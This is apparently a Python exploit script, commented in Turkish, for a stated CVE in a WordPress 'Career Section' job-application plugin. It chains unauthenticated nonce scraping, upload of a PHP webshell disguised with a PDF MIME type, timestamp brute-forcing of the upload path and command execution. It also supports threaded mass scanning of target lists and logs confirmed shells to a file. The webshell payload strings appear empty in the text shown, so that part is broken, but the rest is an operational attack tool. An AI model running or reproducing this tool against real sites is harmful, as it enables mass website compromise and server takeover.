#!/usr/bin/env python3 """ CVE-2026-6271 — Career Section WordPress Plugin <= 1.7 Unauthenticated Arbitrary File Upload → Remote Code Execution Saldırı Zinciri: 1. csection custom post type URL'lerini bul (sitemap / slug tarama) 2. Job listing sayfasından csaf_form_nonce çek (public HTML'de gömülü) 3. shell.php dosyasını application/pdf MIME tipiyle yükle 4. Timestamp brute-force ile shell URL'ini bul 5. RCE doğrula → uid=33(www-data) Researcher : Paolo Tresso - Wordfence CVSS : 9.8 Critical """ import requests import argparse import re import sys import time from concurrent.futures import ThreadPoolExecutor, as_completed from threading import Lock requests.packages.urllib3.disable_warnings() G = "\033[92m"; R = "\033[91m"; Y = "\033[93m" C = "\033[96m"; D = "\033[90m"; B = "\033[1m"; X = "\033[0m" _lock = Lock() _counter = [0] def out(msg): with _lock: sys.stdout.write("\r" + " " * 90 + "\r") sys.stdout.write(msg + "\n") sys.stdout.flush() def progress(total): with _lock: _counter[0] += 1 n = _counter[0] pct = n * 100 // total bar = "█" * (pct // 5) + "░" * (20 - pct // 5) sys.stdout.write(f"\r[{bar}] {n}/{total} ({pct}%) ") sys.stdout.flush() # ══════════════════════════════════════════════════════════════ # SHELL TİPLERİ # ══════════════════════════════════════════════════════════════ def build_shell(shell_type="system"): shells = { "system": b'', "passthru": b'', "exec": b'', "assert": b'', "b64": b'', "full": ( b'".$o."";} ?>' ), } return shells.get(shell_type, shells["system"]) # ══════════════════════════════════════════════════════════════ # JOB LİSTİNG URL BULMA — csection custom post type # ══════════════════════════════════════════════════════════════ # csection post type için yaygın slug'lar JOB_SLUGS = [ "/careers/", "/jobs/", "/job/", "/career/", "/job-listings/", "/job-board/", "/vacancies/", "/positions/", "/opportunities/", "/employment/", "/apply/", "/csection/", "/career-section/", "/work-with-us/", "/join-us/", "/hiring/", "/open-positions/", "/job-openings/", ] def find_job_urls(sess, base): """ csection post type URL'lerini bul: 1. Sitemap'ten tara 2. Yaygın slug'ları dene 3. wp-json REST API'den csection postlarını çek """ job_urls = [] # 1. Sitemap tarama for sm in ["/sitemap.xml", "/sitemap_index.xml", "/wp-sitemap.xml", "/page-sitemap.xml", "/csection-sitemap.xml"]: try: r = sess.get(base + sm, timeout=5) if r.status_code == 200: urls = re.findall(r'(https?://[^<]+)', r.text) for u in urls: if not re.search(r'\.(jpg|png|gif|css|js|xml)$', u, re.I): job_urls.append(u) if len(job_urls) >= 20: break except: continue # 2. wp-json REST API — csection post type for ep in ["/wp-json/wp/v2/csection", "/wp-json/wp/v2/career-section", "/wp-json/wp/v2/careers"]: try: r = sess.get(base + ep + "?per_page=10", timeout=5) if r.status_code == 200: posts = r.json() if isinstance(posts, list): for p in posts: link = p.get("link", "") if link: job_urls.append(link) except: continue # 3. Yaygın slug'ları ekle for slug in JOB_SLUGS: job_urls.append(base + slug) # Tekrarları kaldır return list(dict.fromkeys(job_urls)) # ══════════════════════════════════════════════════════════════ # NONCE ÇEKME — csaf_form_nonce # ══════════════════════════════════════════════════════════════ NONCE_PATTERNS = [ # Standart wp_nonce_field çıktısı r'name=["\']csaf_form_nonce["\']\s+value=["\']([a-zA-Z0-9]{8,})["\']', r'value=["\']([a-zA-Z0-9]{8,})["\']\s+[^>]*name=["\']csaf_form_nonce["\']', # id ile r'id=["\']csaf_form_nonce["\']\s+[^>]*value=["\']([a-zA-Z0-9]{8,})["\']', # Genel nonce field r'csaf_form_nonce["\'][^>]*value=["\']([a-zA-Z0-9]{8,})["\']', # wp_nonce_field genel pattern r'_wpnonce["\'][^>]*value=["\']([a-zA-Z0-9]{8,})["\']', ] def extract_nonce(html): """HTML içinden csaf_form_nonce değerini çek.""" for pat in NONCE_PATTERNS: m = re.search(pat, html, re.S | re.I) if m: return m.group(1) return None def is_job_page(html): """Sayfanın csection job listing sayfası olup olmadığını kontrol et.""" indicators = [ "csaf_form_nonce", "career-section", "csection", "cv", "first_name", "Apply Now", "apply-now", "job-application", ] html_lower = html.lower() return any(ind.lower() in html_lower for ind in indicators) def get_nonce(sess, base): """ Job listing sayfasını bul ve nonce çek. Birden fazla URL denenir. """ job_urls = find_job_urls(sess, base) for url in job_urls[:40]: try: r = sess.get(url, timeout=6, allow_redirects=True) if r.status_code != 200: continue if not is_job_page(r.text): continue nonce = extract_nonce(r.text) if nonce: return nonce, url except: continue return None, None # ══════════════════════════════════════════════════════════════ # SHELL YÜKLEME # ══════════════════════════════════════════════════════════════ def upload_shell(sess, job_url, nonce, shell_name="shell.php", shell_type="system"): """ PHP webshell'i application/pdf MIME tipiyle job application formuna yükle. Form alanları (templates/single-csection.php'den): - first_name, last_name, present_address - email_address, mobile_no, post_name - submit, csaf_form_nonce - cv (dosya) ← hedef alan """ ts_before = int(time.time()) # timestamp tahmini için files = { "cv": ( shell_name, build_shell(shell_type), "application/pdf" # ← MIME Spoofing — PHP dosyasını PDF gibi gönder ) } data = { "first_name": "John", "last_name": "Doe", "present_address": "123 Main Street", "email_address": "applicant@example.com", "mobile_no": "1234567890", "post_name": "Software Engineer", "submit": "Submit", "csaf_form_nonce": nonce, # ← Public sayfadan çekilen nonce } try: r = sess.post(job_url, files=files, data=data, timeout=12) ts_after = int(time.time()) body = r.text # Başarı göstergeleri success = any(ind in body for ind in [ "Application has been sent", "application has been sent", "successfully", "thank you", "Thank you", "submitted", ]) # Hata göstergeleri blocked = any(ind in body for ind in [ "file type", "not allowed", "invalid", "error", "failed", ]) if r.status_code == 200 and not blocked: return { "status": "UPLOADED", "ts_before": ts_before, "ts_after": ts_after, "confirmed": success, } elif blocked: return {"status": "BLOCKED", "raw": body[:200]} else: return {"status": f"HTTP_{r.status_code}", "raw": body[:200]} except requests.exceptions.Timeout: return {"status": "TIMEOUT"} except requests.exceptions.ConnectionError: return {"status": "CONN_ERR"} except Exception as e: return {"status": "EXCEPTION", "err": str(e)} # ══════════════════════════════════════════════════════════════ # TIMESTAMP BRUTE-FORCE — Shell URL tespiti # ══════════════════════════════════════════════════════════════ UPLOAD_PATH = "/wp-content/uploads/cs_applicant_submission_files" def find_shell(sess, base, shell_name, ts_before, ts_after, cmd="id", window=5): """ Dosya adı: _ ts_before - window ile ts_after + window arasındaki tüm timestamp'leri dene. sanitize_file_name() sadece özel karakterleri temizler, uzantıya dokunmaz → shell.php olarak kalır. """ uploads = base + UPLOAD_PATH # Timestamp aralığı: yükleme öncesi-5 ile sonrası+5 ts_start = ts_before - window ts_end = ts_after + window for ts in range(ts_start, ts_end + 1): url = f"{uploads}/{ts}_{shell_name}" try: r = sess.get(url, params={"cmd": cmd}, timeout=5, allow_redirects=True) if r.status_code == 200: body = r.text.strip() # RCE başarılı if "uid=" in body and "gid=" in body: return "RCE_OK", url, body[:200] # Shell erişilebilir ama exec disabled if len(body) > 0 and body not in ("", "0"): return "SHELL_ALIVE", url, body[:200] # Boş yanıt — shell var ama exec kapalı if r.status_code == 200: return "EXEC_DISABLED", url, "" except: continue return "NOT_FOUND", "", "" # ══════════════════════════════════════════════════════════════ # TEKİL HEDEF KONTROLÜ # ══════════════════════════════════════════════════════════════ def check(target, args, total=1): if not target.startswith("http"): target = "http://" + target sess = requests.Session() sess.headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" sess.verify = False # Bağlantı testi try: r = sess.get(target, timeout=8, allow_redirects=True) base = r.url.rstrip("/") except: progress(total) return {"status": "UNREACH", "url": target} # ── Adım 1: Nonce çek ── nonce, job_url = get_nonce(sess, base) if not nonce: progress(total) return {"status": "NO_NONCE", "url": base} # ── Adım 2: Shell yükle ── upload = upload_shell( sess, job_url, nonce, shell_name=args.shell_name, shell_type=args.shell_type, ) if upload["status"] != "UPLOADED": progress(total) return { "status": upload["status"], "url": base, "nonce": nonce, "job_url": job_url, "raw": upload.get("raw", ""), } # ── Adım 3: Timestamp brute-force ile shell bul ── rce_status, shell_url, rce_out = find_shell( sess, base, shell_name=args.shell_name, ts_before=upload["ts_before"], ts_after=upload["ts_after"], cmd=args.verify_cmd, window=args.ts_window, ) progress(total) return { "status": "UPLOADED_" + rce_status, "url": base, "nonce": nonce, "job_url": job_url, "confirmed": upload.get("confirmed", False), "shell_url": shell_url, "rce_out": rce_out, } # ══════════════════════════════════════════════════════════════ # ÇIKTI YAZICI # ══════════════════════════════════════════════════════════════ def print_result(res, fout=None): s = res["status"] u = res.get("url", "") if s == "UPLOADED_RCE_OK": out(f"{G}[★ RCE OK ] {u}") out(f" Nonce : {res.get('nonce','')} (kaynak: {res.get('job_url','')})") out(f" Shell URL : {res.get('shell_url','')}") out(f" RCE Çıktı : {res.get('rce_out','')}{X}") if fout: fout.write( f"RCE {u} shell={res.get('shell_url','')} " f"nonce={res.get('nonce','')}\n" ) fout.flush() elif s == "UPLOADED_SHELL_ALIVE": out(f"{Y}[★ SHELL ] {u}") out(f" Shell URL : {res.get('shell_url','')}") out(f" Yanıt : {res.get('rce_out','')}{X}") if fout: fout.write(f"SHELL {u} shell={res.get('shell_url','')}\n") fout.flush() elif s == "UPLOADED_EXEC_DISABLED": out(f"{Y}[~ EXEC_DIS ] {u} shell={res.get('shell_url','')} (exec disabled){X}") if fout: fout.write(f"EXEC_DIS {u} shell={res.get('shell_url','')}\n") fout.flush() elif s == "UPLOADED_NOT_FOUND": out(f"{C}[? UPLOADED ] {u} (yüklendi ama shell bulunamadı — TS window artır){X}") elif s == "BLOCKED": out(f"{D}[- BLOCKED ] {u} (dosya tipi engellendi){X}") elif s == "NO_NONCE": out(f"{Y}[~ NO_NONCE ] {u} (csaf_form_nonce bulunamadı){X}") elif s == "UNREACH": out(f"{D}[~ UNREACH ] {u}{X}") elif s == "TIMEOUT": out(f"{D}[~ TIMEOUT ] {u}{X}") elif s == "CONN_ERR": out(f"{D}[~ CONN_ERR ] {u}{X}") else: out(f"{D}[- {s:12s}] {u} {res.get('raw','')[:80]}{X}") # ══════════════════════════════════════════════════════════════ # MAIN # ══════════════════════════════════════════════════════════════ def main(): ap = argparse.ArgumentParser( description="CVE-2026-6271 — Career Section <= 1.7 RCE Scanner", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=""" Örnekler: # Tekil hedef python career_section_rce.py -u http://hedef.com # Özel job URL ile (direkt) python career_section_rce.py -u http://hedef.com --job-url http://hedef.com/careers/engineer/ # Toplu tarama python career_section_rce.py -l targets.txt -t 20 -o sonuclar.txt # Timestamp window artır (yavaş sunucular için) python career_section_rce.py -u http://hedef.com --ts-window 10 # Full shell + özel komut python career_section_rce.py -u http://hedef.com --shell-type full --verify-cmd "whoami" # Proxy ile (Burp Suite) python career_section_rce.py -u http://hedef.com --proxy http://127.0.0.1:8080 """ ) group = ap.add_mutually_exclusive_group(required=True) group.add_argument("-u", "--url", help="Tekil hedef URL") group.add_argument("-l", "--list", help="Hedef listesi dosyası") ap.add_argument("-t", "--threads", type=int, default=10) ap.add_argument("-o", "--output", default="rce_confirmed.txt") ap.add_argument("--job-url", help="Direkt job listing URL (opsiyonel)") ap.add_argument("--shell-name", default="shell.php") ap.add_argument("--shell-type", choices=["system","passthru","exec","assert","b64","full"], default="system") ap.add_argument("--verify-cmd", default="id", help="RCE doğrulama komutu (varsayılan: id)") ap.add_argument("--ts-window", type=int, default=5, help="Timestamp brute-force penceresi (varsayılan: ±5 sn)") ap.add_argument("--proxy", help="Proxy URL") ap.add_argument("--timeout", type=int, default=10) args = ap.parse_args() # ── Tekil hedef ── if args.url: print(f"\n{B}[*] Hedef : {args.url}") print(f"[*] Shell : {args.shell_name} ({args.shell_type})") print(f"[*] TS Window : ±{args.ts_window} saniye") print(f"[*] Verify CMD : {args.verify_cmd}{X}\n") res = check(args.url, args, total=1) print_result(res) if "UPLOADED" in res["status"]: with open(args.output, "w") as f: if res.get("shell_url"): f.write(f"{res['shell_url']}\n") print(f"\n{G}[+] Kaydedildi → {args.output}{X}") return # ── Toplu tarama ── with open(args.list) as f: targets = [l.strip() for l in f if l.strip()] total = len(targets) _counter[0] = 0 print(f"\n{B}[*] {total} hedef | CVE-2026-6271 Career Section | threads={args.threads}{X}\n") stats = {} with open(args.output, "w") as fout: with ThreadPoolExecutor(max_workers=args.threads) as ex: futs = {ex.submit(check, t, args, total): t for t in targets} for fut in as_completed(futs): res = fut.result() s = res["status"] stats[s] = stats.get(s, 0) + 1 print_result(res, fout) sys.stdout.write("\n") print(f"\n{B}{'─'*62}") for k, v in sorted(stats.items(), key=lambda x: -x[1]): bar = "█" * min(v, 30) print(f" {k:28s}: {v:4d} {bar}") print(f"{'─'*62}") print(f" RCE onaylı → {args.output}") print(f"{'─'*62}{X}") if __name__ == "__main__": main()